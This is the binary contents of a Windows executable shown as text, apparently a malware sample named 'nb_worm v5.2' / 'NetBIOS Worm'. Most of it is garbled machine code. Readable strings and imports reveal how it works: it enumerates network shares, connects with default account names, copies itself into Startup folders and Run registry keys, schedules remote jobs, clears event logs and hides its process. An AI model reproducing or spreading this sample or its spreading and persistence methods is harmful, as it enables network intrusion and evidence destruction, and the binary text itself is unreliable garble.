MZ@ !L!This program cannot be run in DOS mode. $!rrrrrrrfrrrrrrrr֫rrRichrPELdx>   @@ .textP  `.rdata&  @@.data00@ nb_worm v5.2 U\Ph( t  3V3pPjVhp@jj8 @PFd|^h @U2@92@~L2@92@2@~4%2@2@92@~%2@(0@9(0@~ (0@ SV5 @WEj P5(0@֋]EPSL0@WSEj P52@֍EPSsWSlEj P52@փDEPSQWSJEj P52@֍EPS2$_^[UdS @VW3EPYjjjhfEfEƍEPEȍEjPWW3|h1@PEPPPPPPh1@PlPPY0E荅hPVEuu0 @P4 @j\P` @YYE0@E 0@EV0E0EP/u荅Ph\1@PWPVPPӅu荅Ph41@PWPsVPPӅuMu荅PRh0@P;WP.VPPӃuBh0@ h0@hP0@PWPPPVuVut E}|E}(0@E} 0@Ih @kU Vh3PV0 @P4 @EVPVh?VVVh1@h @hPjVPu @u @^U`h 2@PYhYP @xudVdh3PV0 @P4 @EVPVh?VVVh1@h @dhPj`VPu @u @^UdEjPPKEP3@ twSVWjPEPC uPEh2@Pl @5h @L0@ESP֋=d @PSj(0@PSj2@PSj2@P׃<2@_^[(0@;u92@u2 (0@2@j Y;u%2@ (0@%2@2@U f2@VW3fjfY3efhX2@f( @5$ @hH2@Wh42@W2@h 2@W2@փ=2@2@=2@u5t @@PuPu @Pu Pփ EPP2@uZMQAk<A k<AkdA=2@jEjPj EEPEPPu2@_^h2@( @thh2@P$ @2@tjjUhljP lDžlP @|uBh2@Ph2@PPP @jP @U f2@SVWfu3fh@PuPt @eE3PEPEPEh PjP];ljEt;}uvM6h2@Pl @ vh2@Pl @h2@Pt!C ;]ruV9}u6[jju Pu xu[VUjX3_^[% @% @% @% @% @% @% @% @% @% @%D @%@ @% @% @%X @%\ @%p @%L @%x @%| @Ujh @h@@dPd%hSVWe3ۉ]j @Y 2@ 2@ @ 2@ @ 2@T @2@92@u h:@P @Yh 0@h0@2@EEP52@EPEPEP @h0@h0@$ @0u>"u:Fu:t<"u>"uFu:t< v]ЍEP, @EtE> vFuj XPVSS0 @PEP @E MPQYYËeu @% @% @hhYY3% @% @"""""$$~$$$$$$$""#$$J#T#^#h#p#z###########J$,$<$\$%p$#,#94 t s@@H"t" !" !#@ <"<# !#L !% """""$$~$$$$$$$""#$$J#T#^#h#p#z###########J$,$<$\$%p$#,#94 t sWSOCK32.dll[RegCloseKeyRegSetValueExA_RegCreateKeyExA0ClearEventLogA@OpenEventLogAADVAPI32.dllWNetCancelConnectionAWNetAddConnection2AMPR.dllHNetApiBufferFreeNetShareEnumNETAPI32.dllstrcatstrcpystrrchr=atoistrtoksprintfmemcpymemsetmbstowcsstrlenstrcmpMSVCRT.dll_exitH_XcptFilterIexit_acmdlnX__getmainargs_initterm__setusermatherr_adjust_fdivj__p__commodeo__p__fmode__set_app_type_except_handler3_controlfpSleepJCreateThread$GetModuleFileNameA&GetModuleHandleA(CopyFileAuGetVersionExA>GetProcAddressLoadLibraryAPGetStartupInfoAKERNEL32.dll4_itoa<0@40@,0@2@ OwnerGuestAdministrator."C:\Documents and Settings\All Users\Start Menu\Programs\Startup""C:\WINDOWS\Start Menu\Programs\Startup""C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup"\WINNT\Profiles\All Users\Start Menu\Programs\Startup\WINDOWS\Start Menu\Programs\Startup\Documents and Settings\All Users\Start Menu\Programs\Startup\\\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\RunServicesNetBIOS Worm%sNetApiBufferFreeNetScheduleJobAddNetRemoteTODnetapi32.dllRegisterServiceProcesskernel32.dllSecurity\localhostC:\%S